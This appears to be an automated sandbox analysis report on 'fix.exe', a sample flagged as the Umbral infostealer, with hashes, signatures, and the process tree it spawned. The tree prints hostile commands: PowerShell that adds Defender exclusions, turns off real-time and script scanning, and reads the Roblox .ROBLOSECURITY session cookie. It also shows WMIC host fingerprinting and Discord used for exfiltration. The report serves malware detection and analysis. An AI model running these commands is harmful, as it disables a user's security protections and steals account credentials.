Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07-06-2024 22:13
Behavioral task
behavioral1
Sample
fix.exe
Resource
win7-20240508-en
General
-
Target
fix.exe
-
Size
229KB
-
MD5
1adeea63d576dea9add98e01e9fe78b4
-
SHA1
8f754fd661d9ce2e9e9a7278b4dd7096b13fc585
-
SHA256
5a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84
-
SHA512
0ba3c5555273a15c5406f0bd1b5f1a3888814bdbb4130f80eae1f973497c4e5d81a92ed0797a55316b358a42a955fe44f476d1e0e90c15211dc30f4dd20c58cb
-
SSDEEP
6144:lloZMCrIkd8g+EtXHkv/iD4sodaBPUonIWvRsY99ib8e1miLZi:noZZL+EP8sodaBPUonIWvRsY9wfLA
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/652-1-0x0000024BA9B90000-0x0000024BA9BD0000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3108 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 discord.com 26 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3204 wmic.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3108 powershell.exe 3108 powershell.exe 220 powershell.exe 220 powershell.exe 1048 powershell.exe 1048 powershell.exe 3516 powershell.exe 3516 powershell.exe 388 powershell.exe 388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 652 fix.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 220 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe Token: SeIncreaseQuotaPrivilege 3376 wmic.exe Token: SeSecurityPrivilege 3376 wmic.exe Token: SeTakeOwnershipPrivilege 3376 wmic.exe Token: SeLoadDriverPrivilege 3376 wmic.exe Token: SeSystemProfilePrivilege 3376 wmic.exe Token: SeSystemtimePrivilege 3376 wmic.exe Token: SeProfSingleProcessPrivilege 3376 wmic.exe Token: SeIncBasePriorityPrivilege 3376 wmic.exe Token: SeCreatePagefilePrivilege 3376 wmic.exe Token: SeBackupPrivilege 3376 wmic.exe Token: SeRestorePrivilege 3376 wmic.exe Token: SeShutdownPrivilege 3376 wmic.exe Token: SeDebugPrivilege 3376 wmic.exe Token: SeSystemEnvironmentPrivilege 3376 wmic.exe Token: SeRemoteShutdownPrivilege 3376 wmic.exe Token: SeUndockPrivilege 3376 wmic.exe Token: SeManageVolumePrivilege 3376 wmic.exe Token: 33 3376 wmic.exe Token: 34 3376 wmic.exe Token: 35 3376 wmic.exe Token: 36 3376 wmic.exe Token: SeIncreaseQuotaPrivilege 3376 wmic.exe Token: SeSecurityPrivilege 3376 wmic.exe Token: SeTakeOwnershipPrivilege 3376 wmic.exe Token: SeLoadDriverPrivilege 3376 wmic.exe Token: SeSystemProfilePrivilege 3376 wmic.exe Token: SeSystemtimePrivilege 3376 wmic.exe Token: SeProfSingleProcessPrivilege 3376 wmic.exe Token: SeIncBasePriorityPrivilege 3376 wmic.exe Token: SeCreatePagefilePrivilege 3376 wmic.exe Token: SeBackupPrivilege 3376 wmic.exe Token: SeRestorePrivilege 3376 wmic.exe Token: SeShutdownPrivilege 3376 wmic.exe Token: SeDebugPrivilege 3376 wmic.exe Token: SeSystemEnvironmentPrivilege 3376 wmic.exe Token: SeRemoteShutdownPrivilege 3376 wmic.exe Token: SeUndockPrivilege 3376 wmic.exe Token: SeManageVolumePrivilege 3376 wmic.exe Token: 33 3376 wmic.exe Token: 34 3376 wmic.exe Token: 35 3376 wmic.exe Token: 36 3376 wmic.exe Token: SeIncreaseQuotaPrivilege 2328 wmic.exe Token: SeSecurityPrivilege 2328 wmic.exe Token: SeTakeOwnershipPrivilege 2328 wmic.exe Token: SeLoadDriverPrivilege 2328 wmic.exe Token: SeSystemProfilePrivilege 2328 wmic.exe Token: SeSystemtimePrivilege 2328 wmic.exe Token: SeProfSingleProcessPrivilege 2328 wmic.exe Token: SeIncBasePriorityPrivilege 2328 wmic.exe Token: SeCreatePagefilePrivilege 2328 wmic.exe Token: SeBackupPrivilege 2328 wmic.exe Token: SeRestorePrivilege 2328 wmic.exe Token: SeShutdownPrivilege 2328 wmic.exe Token: SeDebugPrivilege 2328 wmic.exe Token: SeSystemEnvironmentPrivilege 2328 wmic.exe Token: SeRemoteShutdownPrivilege 2328 wmic.exe Token: SeUndockPrivilege 2328 wmic.exe Token: SeManageVolumePrivilege 2328 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 652 wrote to memory of 3108 652 fix.exe 90 PID 652 wrote to memory of 3108 652 fix.exe 90 PID 652 wrote to memory of 220 652 fix.exe 92 PID 652 wrote to memory of 220 652 fix.exe 92 PID 652 wrote to memory of 1048 652 fix.exe 94 PID 652 wrote to memory of 1048 652 fix.exe 94 PID 652 wrote to memory of 3516 652 fix.exe 96 PID 652 wrote to memory of 3516 652 fix.exe 96 PID 652 wrote to memory of 3376 652 fix.exe 98 PID 652 wrote to memory of 3376 652 fix.exe 98 PID 652 wrote to memory of 2328 652 fix.exe 101 PID 652 wrote to memory of 2328 652 fix.exe 101 PID 652 wrote to memory of 972 652 fix.exe 103 PID 652 wrote to memory of 972 652 fix.exe 103 PID 652 wrote to memory of 388 652 fix.exe 105 PID 652 wrote to memory of 388 652 fix.exe 105 PID 652 wrote to memory of 3204 652 fix.exe 107 PID 652 wrote to memory of 3204 652 fix.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\fix.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:388
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:3204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1036 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵PID:3104
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
948B
MD5ecac37a294a8f17b9c89abc6354cb1fe
SHA1b918fd8ca0ec11fc4a39633a8dc94abe60140eb9
SHA25651037b293178bc395824bb6fd9b80ba7c23399c4e4a74f0bc067a557a1da9fb8
SHA5127b5e3032a2848f46cbf330b06693304945e4257cc2a7220f28adaa7b71aad7f63872379aebe6f1cfb68b78a9605d3ed5c1ddc6549f720e9bb7ac95b1c2a0ed64
-
Filesize
1KB
MD557c9afc76e218af6740cddec86b8d154
SHA15284732e69315f90b9e9515180f1612a19dedaa5
SHA2560be96f24ba9a643ea5e09901c8c9398d63c475f2c41e126563f1ca980338a48c
SHA5127fc967fc456f93e5ad1752171256284afb53768ec2e5ec1c02c35175b7bf0586a0e9e0318a9779970abac3c0d55e2946840d3597c2f28db0ad22d123b8b1f0fe
-
Filesize
1KB
MD5d9d2e5db9e09be20ad0a44e76e96e104
SHA176d8f8e9cccf05ad348e6b31ecd05a4d55f9c04a
SHA256443e637928501418b10db993aa9a59b0d5eee42a1e37f1888e8c05bd42206a6e
SHA5122c87b1d2d208b25c3e5ffe38d8ff3a6b86c1eddac7e9d4a036826884f08d72b0855df11e2c8b9144054e07e5f1e431936413fd9de276aac2862613c2dd6c6fcc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82